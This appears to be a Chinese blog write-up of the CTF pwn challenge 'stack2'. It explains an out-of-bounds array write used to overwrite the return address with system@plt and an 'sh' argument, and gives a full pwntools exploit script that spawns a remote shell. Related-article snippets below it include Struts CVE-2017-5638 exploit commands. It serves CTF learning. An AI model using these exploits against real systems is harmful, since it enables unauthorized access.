pwn做题笔记13-stack2(以字节形式构造栈帧内容)

最新推荐文章于 2023-06-01 09:59:10 发布
最新推荐文章于 2023-06-01 09:59:10 发布
阅读量154 收藏
点赞数 1
文章标签: 笔记
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_40923256/article/details/130712906
版权

0x1

检查安全机制,开启了canary、栈不可执行,没开ALSR:

 0x2

运行程序,有四个功能:

ida静态分析,没有溢出漏洞,但是在改变数字时没有对数组索引作校验,因此可以越界读写

 0x3

数组类型是char,因此每个单元1字节,p32程序栈帧大小4字节,因此每个栈帧对应4个数组单元:

栈结构如下:

 与返回地址偏移0x70+0x4字节

但是,实际上利用0x74作偏移时是不行的,原因在于main的最后修改了esp的值,因此返回地址应该是修改后的esp的下方4字节

 用gdb在ret下断点作动态分析:

可以看到lea指令实际效果是esp+10,因此,真正的返回地址偏移起始位置是0x84

0x4 

由于程序是小端序,因此栈低地址(靠近栈顶)存放低位地址,即对于hack_here首条指令地址0x0804859B:

数组下标0x84-0x87存放0x9B、0x85、0x04、0x08实现调用/bin/bash

0x5

但是!远程主机没有bash,因此这个hack_here是无效的

发现plt表有system条目:

 ROPgardget查找字符串sh:

因此,数组下标0x84-0x87存放0x50、0x84、0x04、0x08,即返回地址

system形参有两个,一般是0、内容,因此:

  • 数组下标0x88-0x8B跳过或写0
  • 数组下标0x8C-0x8F存放sh字符串地址,即0x87、0x89、0x04、0x08

 由于有那个+10,这里就不画栈结构了,代码如下:

from pwn import*

context(os='linux', arch='amd64',log_level = 'debug')

p=remote("61.147.171.105", 51684)
#p=process("./3f")
p.sendlineafter(" have:","1")
p.sendlineafter("numbers","1")
p.sendlineafter("5. exit","3")
#0x080485D0
p.sendlineafter("which number to change:",str(int(0x84)))
p.sendlineafter("new number:",str(0x50))

p.sendlineafter("5. exit","3")
p.sendlineafter("which number to change:",str(int(0x85)))
p.sendlineafter("new number:",str(int(0x84)))

p.sendlineafter("5. exit","3")
p.sendlineafter("which number to change:",str(int(0x86)))
p.sendlineafter("new number:",str(int(0x04)))

p.sendlineafter("5. exit","3")
p.sendlineafter("which number to change:",str(int(0x87)))
p.sendlineafter("new number:",str(int(0x08)))


#0x08048ab3
p.sendlineafter("5. exit","3")
p.sendlineafter("which number to change:",str(int(0x8C)))
p.sendlineafter("new number:",str(int(0x87)))

p.sendlineafter("5. exit","3")
p.sendlineafter("which number to change:",str(int(0x8D)))
p.sendlineafter("new number:",str(int(0x89)))

p.sendlineafter("5. exit","3")
p.sendlineafter("which number to change:",str(int(0x8E)))
p.sendlineafter("new number:",str(int(0x04)))

p.sendlineafter("5. exit","3")
p.sendlineafter("which number to change:",str(int(0x8F)))
p.sendlineafter("new number:",str(int(0x08)))

p.sendlineafter("5. exit","5")
p.interactive()

运行结果:

 0x6

注意一下:

  • 这里利用的是main结束后的ret
  • 利用IO向内存直接写16进制数据要先把十六进制转int,再转str,即str(int(0x1)),否则是无效的
_alpaca_
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
了解帧结构
na_hanqiannan的博客
05-13 1988
内存的分配方式有三种:●从静态区域分配  内存在程序编译的时候就已经分配好,这块内存在程序的整个运行期间都存在。如 全局变量、stasic变量●在上创建  在执行函数时,函数内局部变量的存储单元都可以在上创建,函数执行结束时这些存储单元自动被释放。内存分配运算内置于处理器的指令集中,效率很高,但是分配的内存容量有限。●从堆上分配(动态内存分配)  程序在运行的时候用malloc或new(c+...
pwn之stack2
醉等佳人归
09-07 372
1.目 1.保护机制 开了canary和nx 2.目 简单来说就是一个计算器,支持以下功能: 2.思路 重点1:问出在第三个功能上,第三个功能是支持修改数组中的元素的,但函数没有进行index判断,导致我们通过这个偏移写任意数据到任意偏移地址,即可以覆盖函数返回地址 重点2:程序中给了一个后门函数,但是运行后发现没有/bin/bash,所以我们要自己调用system,参数的话直接使用/bin/bash中的sh即可 from pwn import * context(arch="i386",os=
pwn-stack-wp
diaojian3887的博客
08-29 190
stack2 知识点:数组溢出 正文 程序拖入IDA进行反编译,查看逻辑。 既然发现了溢出点,那么就是确定我们的ret地址和数组第一位数据的距离问。我们使用gdb进行动态调试。 在0x0804884D进行下断点。我们根据选项去更改数组中第一位的数据。得到数组起始地址为0xffffcef8。 找到起始地址之后,我们去寻找执行ret指令时,的地址然后求其差值即可。...
运行时帧结构
七月听雪的博客
12-29 91
2.操作数 3.动态规划: 4.方法返回地址: 5.附加信息: http://www.360doc.com/content/14/0925/13/1073512_412236522.shtml https://blog.csdn.net/xtayfjpk/article/details/41924283 ...
struts-pwn:Apache Struts CVE-2017-5638的漏洞利用
05-18
python struts-pwn.py --list 'urls.txt' -c 'id' 检查针对单个URL的漏洞是否存在。 python struts-pwn.py --check --url 'http://example.com/struts2-showcase/index.action' 根据URL列表检查漏洞是否存在。 ...
pwn目中的libc-2.27.so文件
04-11
pwn,有些时候目不给这个文件,这里是这个库的文件。
CSAWCTF-2018-pwn-shellcode|CSAWCTF-2018-pwn-shellcode
12-10
CSAWCTF 2018年pwn shellcode 变形shellcode练手目,该目主要是利用三个节点来注入shellcode,考验解人对shellcode的熟悉程度。解:https://blog.csdn.net/A951860555/article/details/110350773
PWN-shellcode-WP- (一)目文件.rar
03-29
为几道搜集的真,https://blog.csdn.net/qq_43390703/article/details/105181147中有对他们的详细解答,是学习pwn入门的很好练手和熟悉知识点以及pwn技巧的真
Wi-PWN_8.0_ENGLISH_OLED.bin
08-25
这是ESP8266的带OLED显示的WIFI杀手固件。
pwn stack2
weixin_45677731的博客
03-15 171
拖进32位ida 大致分析一波,这个程序就是你可以往这里面存一些数字,然后选择展示数字,增加数字等操作,这我又学到了一个新的较为隐蔽的漏洞:数组溢出 看这里,当我们选择3,add number选项时,虽然v13数组定义的是100个,但是对v5没有任何的检测,这样一来,我们就能修改任意一个数字,包括100个开外的数据,我们可以利用这一点,改变返回地址等参数 这里的hackhere是用不了的,...
过程(帧结构是干货)
weixin_30820077的博客
07-26 247
【0】写在前面 过程(帧结构是干货);本文总结于csapp, 加上自己的理解; 【1】帧结构 每个函数的每次调用,都有它自己独立的一个帧,这个帧中维持着所需要的各种信息。 过程调用:函数调用另一个词语表示叫作过程; IA32 程序 用程序 来支持过程调用; 【2】转移控制 (此处非常重要:关系到对函数调用和返回理解是否到位...
171119 Pwn-StackSmash
whklhhhh的博客
11-24 975
1625-5 王子昂 总结《2017年11月19日》 【连续第415天总结】 A. pwn-StackSmash B.原理当程序加了Cannary来保护时,溢出会使得程序异常终止并输出错误信息 StackSmash就是利用这个错误信息进行任意地址读取的 报错函数为__stack_chk_fail,代码如下:void __attribute__ ((noreturn)) __stack_c
buuoj [第六章 CTF之PWN章]stack
yongbaoii的博客
01-20 1018
ret2text 习惯性查一下保护,啥也不是。 很明显的溢出。 很明显的shellcode 直接十八个字节再加上返回地址就有了。 exp from pwn import* r = remote('node3.buuoj.cn',27516) #r = process('./stack') context.log_level = "debug" #gdb.attach(r) system_addr = 0x400537 payload = 'a' * 18 + p64(0x40054e) + p64(
14、运行时帧结构
u011603018的博客
03-26 171
jvm运行时线程私有的内存区域 虚拟机分为4个部分:局部变量表、操作数、动态链接、返回地址和附加信息 局部变量表 局部变量表在编译的时候,已经计算好了分配的内存空间 局部变量表的最小单位 slot java么有说明slot占多少个字节,多少位,但是,是这样说的。1个slot可以存放int、float、short、boolean、 refrence、byte、char、returnAddres...
攻防世界 PWN 高手进阶 stack2 (write up)
qq_44768749的博客
08-18 414
攻防世界 PWN 高手进阶 stack2 (write up)stack20x01 查看保护机制0x02 查看反汇编0x03 利用过程修改返回地为system地址设置system函数的参数为'sh'exp stack2 该利用未对数组边界进行检查,从而可以实现溢出 0x01 查看保护机制 32位 开启NX和canary 无PIE 0x02 查看反汇编 int __cdecl main(int argc, const char **argv, const char **envp) { int
pwnstack-攻防世界
32bin的博客
04-01 553
【代码】pwnstack-攻防世界。
攻防世界 pwn——pwnstack
CNS-Enterprise BCC-1701-J
06-01 1035
攻防世界 练习
hackme inndy pwn stack writeup
charlie_heng的专栏
01-02 476
看起来很恐怖,所有保护都开了,但是其实并没有想象中难 这先pop 两次,再push回去一个,然后再push下标,就可以直接绕过canary,把ret的地址给leak出来 再减去libc里面的__libc_start_main偏移,再把低三位给清零就得到libc基址 之后就是常规rop了,这里直接执行system(‘/bin/sh’) 下面就是利用的代码 from pwn imp...
我的ctf刷wp笔记
最新发布
03-25
目涉及到pwn(Payload Writing and Exploitation)技术中的溢出(Stack Overflow)漏洞利用,主要集中在如何通过精心构造payload来控制程序的执行流,尤其是针对ARM架构的程序。 首先,提到的"publicvuln...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值